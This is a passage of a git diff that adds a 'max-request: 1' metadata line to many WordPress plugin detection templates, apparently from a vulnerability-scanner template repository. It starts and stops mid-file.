wpscan: https://wpscan.com/plugin/forminator
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index daf205789d..539d9f7cec 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/ga-google-analytics/
metadata:
+ max-request: 1
plugin_namespace: ga-google-analytics
wpscan: https://wpscan.com/plugin/ga-google-analytics
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index 22bfa3ffe2..f4123bb594 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/gdpr-cookie-compliance/
metadata:
+ max-request: 1
plugin_namespace: gdpr-cookie-compliance
wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 88d38e21ed..23a88ea130 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
metadata:
+ max-request: 1
plugin_namespace: google-analytics-dashboard-for-wp
wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index ad238445fc..8074ac337e 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/google-analytics-for-wordpress/
metadata:
+ max-request: 1
plugin_namespace: google-analytics-for-wordpress
wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index 840c086fb9..575c9ebe67 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/google-listings-and-ads/
metadata:
+ max-request: 1
plugin_namespace: google-listings-and-ads
wpscan: https://wpscan.com/plugin/google-listings-and-ads
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 2678f603c6..7b0f188ff7 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/google-site-kit/
metadata:
+ max-request: 1
plugin_namespace: google-site-kit
wpscan: https://wpscan.com/plugin/google-site-kit
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 20d947a5d1..898e4de56d 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/google-sitemap-generator/
metadata:
+ max-request: 1
plugin_namespace: google-sitemap-generator
wpscan: https://wpscan.com/plugin/google-sitemap-generator
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 22ee97b51f..4a76856a69 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/gtranslate/
metadata:
+ max-request: 1
plugin_namespace: gtranslate
wpscan: https://wpscan.com/plugin/gtranslate
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index 3f4c6c8936..b321ca63eb 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/gutenberg/
metadata:
+ max-request: 1
plugin_namespace: gutenberg
wpscan: https://wpscan.com/plugin/gutenberg
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index fa1bb64115..2b42c9f80c 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/happy-elementor-addons/
metadata:
+ max-request: 1
plugin_namespace: happy-elementor-addons
wpscan: https://wpscan.com/plugin/happy-elementor-addons
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml
index a8eca7b056..2409c6b370 100644
--- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml
+++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/header-and-footer-scripts/
metadata:
+ max-request: 1
plugin_namespace: header-and-footer-scripts
wpscan: https://wpscan.com/plugin/header-and-footer-scripts
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index da63d1cbf6..dbea07a6da 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/header-footer-code-manager/
metadata:
+ max-request: 1
plugin_namespace: header-footer-code-manager
wpscan: https://wpscan.com/plugin/header-footer-code-manager
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index f94e7f6494..17a8f220cf 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/header-footer-elementor/
metadata:
+ max-request: 1
plugin_namespace: header-footer-elementor
wpscan: https://wpscan.com/plugin/header-footer-elementor
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 95d2aa5f16..956a08b32d 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/header-footer/
metadata:
+ max-request: 1
plugin_namespace: header-footer
wpscan: https://wpscan.com/plugin/header-footer
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index af8193b875..5a570b9077 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/health-check/
metadata:
+ max-request: 1
plugin_namespace: health-check
wpscan: https://wpscan.com/plugin/health-check
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 8d7e45818b..4ecac0cd92 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/hello-dolly/
metadata:
+ max-request: 1
plugin_namespace: hello-dolly
wpscan: https://wpscan.com/plugin/hello-dolly
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index ed3967db7b..e50f58cef8 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/host-webfonts-local/
metadata:
+ max-request: 1
plugin_namespace: host-webfonts-local
wpscan: https://wpscan.com/plugin/host-webfonts-local
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 2ff5adba86..031bb48563 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/imagify/
metadata:
+ max-request: 1
plugin_namespace: imagify
wpscan: https://wpscan.com/plugin/imagify
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 9099f3c0a5..3cdcf3da93 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/imsanity/
metadata:
+ max-request: 1
plugin_namespace: imsanity
wpscan: https://wpscan.com/plugin/imsanity
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index 1ee0e67542..c222bc9d4a 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/insert-headers-and-footers/
metadata:
+ max-request: 1
plugin_namespace: insert-headers-and-footers
wpscan: https://wpscan.com/plugin/insert-headers-and-footers
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index 43cb2ab09c..c8acf8c625 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/instagram-feed/
metadata:
+ max-request: 1
plugin_namespace: instagram-feed
wpscan: https://wpscan.com/plugin/instagram-feed
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 7ba81036cf..66b7d6a363 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/intuitive-custom-post-order/
metadata:
+ max-request: 1
plugin_namespace: intuitive-custom-post-order
wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index 24fc3e3295..a36016562d 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/iwp-client/
metadata:
+ max-request: 1
plugin_namespace: iwp-client
wpscan: https://wpscan.com/plugin/iwp-client
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e701e365ba..e4017b1a0a 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/jetpack/
metadata:
+ max-request: 1
plugin_namespace: jetpack
wpscan: https://wpscan.com/plugin/jetpack
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index c0cc5400a8..53d6d393bd 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/kadence-blocks/
metadata:
+ max-request: 1
plugin_namespace: kadence-blocks
wpscan: https://wpscan.com/plugin/kadence-blocks
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index 22687bcffe..c286e9a14f 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/kirki/
metadata:
+ max-request: 1
plugin_namespace: kirki
wpscan: https://wpscan.com/plugin/kirki
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index b69d3d5bfe..364e3cd71e 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/leadin/
metadata:
+ max-request: 1
plugin_namespace: leadin
wpscan: https://wpscan.com/plugin/leadin
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 7975a57702..4fcccbfc33 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/limit-login-attempts-reloaded/
metadata:
+ max-request: 1
plugin_namespace: limit-login-attempts-reloaded
wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index ff4cef94d7..3fbc714d3b 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/limit-login-attempts/
metadata:
+ max-request: 1
plugin_namespace: limit-login-attempts
wpscan: https://wpscan.com/plugin/limit-login-attempts
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index a8903697b0..c49b506979 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/litespeed-cache/
metadata:
+ max-request: 1
plugin_namespace: litespeed-cache
wpscan: https://wpscan.com/plugin/litespeed-cache
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index 3f141c4476..dfcaf6f71b 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/loco-translate/
metadata:
+ max-request: 1
plugin_namespace: loco-translate
wpscan: https://wpscan.com/plugin/loco-translate
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 5355e988a2..61be246fee 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/loginizer/
metadata:
+ max-request: 1
plugin_namespace: loginizer
wpscan: https://wpscan.com/plugin/loginizer
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml
index 6f06b49011..1c16a72d76 100644
--- a/http/technologies/wordpress/plugins/loginpress.yaml
+++ b/http/technologies/wordpress/plugins/loginpress.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/loginpress/
metadata:
+ max-request: 1
plugin_namespace: loginpress
wpscan: https://wpscan.com/plugin/loginpress
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 53d409fb68..50d2e6630b 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/mailchimp-for-woocommerce/
metadata:
+ max-request: 1
plugin_namespace: mailchimp-for-woocommerce
wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 0e908a9580..8d71f7bde9 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/mailchimp-for-wp/
metadata:
+ max-request: 1
plugin_namespace: mailchimp-for-wp
wpscan: https://wpscan.com/plugin/mailchimp-for-wp
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index aeb1875c57..5e1f97086e 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/mailpoet/
metadata:
+ max-request: 1
plugin_namespace: mailpoet
wpscan: https://wpscan.com/plugin/mailpoet
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index 7c15702305..d87d456a8c 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/maintenance/
metadata:
+ max-request: 1
plugin_namespace: maintenance
wpscan: https://wpscan.com/plugin/maintenance
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index 5ce87e6c71..aa9153241e 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/mainwp-child/
metadata:
+ max-request: 1
plugin_namespace: mainwp-child
wpscan: https://wpscan.com/plugin/mainwp-child
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index c342e6b45a..09641796a3 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/malcare-security/
metadata:
+ max-request: 1
plugin_namespace: malcare-security
wpscan: https://wpscan.com/plugin/malcare-security
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index e95041f555..28b70d09bf 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/megamenu/
metadata:
+ max-request: 1
plugin_namespace: megamenu
wpscan: https://wpscan.com/plugin/megamenu
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index 879a0d1c12..b43c10ed7a 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/members/
metadata:
+ max-request: 1
plugin_namespace: members
wpscan: https://wpscan.com/plugin/members
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index 985f5d373a..eb7e78bc7f 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/meta-box/
metadata:
+ max-request: 1
plugin_namespace: meta-box
wpscan: https://wpscan.com/plugin/meta-box
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index 8e1cb46cf0..8881e23860 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/ml-slider/
metadata:
+ max-request: 1
plugin_namespace: ml-slider
wpscan: https://wpscan.com/plugin/ml-slider
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7e3e4e2d7e..7a58c58f63 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/newsletter/
metadata:
+ max-request: 1
plugin_namespace: newsletter
wpscan: https://wpscan.com/plugin/newsletter
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 17ea142c46..5f99b8cac8 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/nextend-facebook-connect/
metadata:
+ max-request: 1
plugin_namespace: nextend-facebook-connect
wpscan: https://wpscan.com/plugin/nextend-facebook-connect
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index 953e4ab3d8..b08876df04 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/nextgen-gallery/
metadata:
+ max-request: 1
plugin_namespace: nextgen-gallery
wpscan: https://wpscan.com/plugin/nextgen-gallery
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 92107fa69c..3f68dffe06 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/ninja-forms/
metadata:
+ max-request: 1
plugin_namespace: ninja-forms
wpscan: https://wpscan.com/plugin/ninja-forms
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 5e1fe4ef5c..34f9bde1d6 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/ocean-extra/
metadata:
+ max-request: 1
plugin_namespace: ocean-extra
wpscan: https://wpscan.com/plugin/ocean-extra
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index 74fb3e6010..d9f645328f 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/official-facebook-pixel/
metadata:
+ max-request: 1
plugin_namespace: official-facebook-pixel
wpscan: https://wpscan.com/plugin/official-facebook-pixel
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index b9f70ba555..8a1196fc9f 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/one-click-demo-import/
metadata:
+ max-request: 1
plugin_namespace: one-click-demo-import
wpscan: https://wpscan.com/plugin/one-click-demo-import
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 6486c02c9a..05025452b7 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/optinmonster/
metadata:
+ max-request: 1
plugin_namespace: optinmonster
wpscan: https://wpscan.com/plugin/optinmonster
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index c45ef4bf89..0bc823830f 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/otter-blocks/
metadata:
+ max-request: 1
plugin_namespace: otter-blocks
wpscan: https://wpscan.com/plugin/otter-blocks
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index 3743307dbc..dafe6974f6 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/password-protected/
metadata:
+ max-request: 1
plugin_namespace: password-protected
wpscan: https://wpscan.com/plugin/password-protected
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index a4c6980041..ba05fb1e16 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/pdf-embedder/
metadata:
+ max-request: 1
plugin_namespace: pdf-embedder
wpscan: https://wpscan.com/plugin/pdf-embedder
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/photo-gallery.yaml b/http/technologies/wordpress/plugins/photo-gallery.yaml
index a224d85727..7fbeea5917 100644
--- a/http/technologies/wordpress/plugins/photo-gallery.yaml
+++ b/http/technologies/wordpress/plugins/photo-gallery.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/photo-gallery/
metadata:
+ max-request: 1
plugin_namespace: photo-gallery
wpscan: https://wpscan.com/plugin/photo-gallery
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index adf3387ddb..7f98d822a8 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/pixelyoursite/
metadata:
